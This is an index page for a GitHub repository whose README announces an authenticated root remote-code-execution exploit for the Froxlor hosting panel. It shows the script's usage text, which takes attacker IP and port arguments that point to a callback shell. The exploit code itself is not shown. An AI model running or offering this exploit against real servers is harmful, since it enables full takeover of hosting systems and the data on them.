Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/sarperavci/froxlor-authenticated-root-rce-exploit
https://github.com/sarperavci/froxlor-authenticated-root-rce-exploit
Last synced: 6 days ago
JSON representation
- Host: GitHub
- URL: https://github.com/sarperavci/froxlor-authenticated-root-rce-exploit
- Owner: sarperavci
- Created: 2024-09-10T08:49:50.000Z (2 months ago)
- Default Branch: main
- Last Pushed: 2024-09-10T11:35:55.000Z (2 months ago)
- Last Synced: 2024-09-10T13:12:02.634Z (2 months ago)
- Language: Python
- Size: 3.91 KB
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# Froxlor Authenticated root RCE Exploit
This authenticated RCE exploit was found by me and rejected by the Froxlor team. I am releasing it now because there is no point in keeping it private if it's a feature.
For live demo, you can watch [https://github.com/sarperavci/Froxlor-Authenticated-root-RCE-Exploit/blob/main/demo.mp4](https://github.com/sarperavci/Froxlor-Authenticated-root-RCE-Exploit/blob/main/demo.mp4)
For more information, you can visit [https://sarperavci.com/Froxlor-Authenticated-RCE/](https://sarperavci.com/Froxlor-Authenticated-RCE/)
## Description
This exploit allows an authenticated admin to execute arbitrary code on the server as **root**, even the server is running as **www-data**.
## Usage
```bash
$ python3 exploit.py -h
usage: exploit.py -i 10.10.10.2 -p 12345 -u admin -P password -U http://10.10.10.10:8081
Froxlor Authenticated RCE with Root Privileges Exploit by @sarperavci
optional arguments:
-h, --help show this help message and exit
-i IP, --ip IP Attacker IP Address
-p PORT, --port PORT Attacker Port
-u USER, --user USER Froxlor Admin Username
-P PASSWORD, --password PASSWORD Froxlor Admin Password
-U URL, --url URL Base URL of the Froxlor Panel
```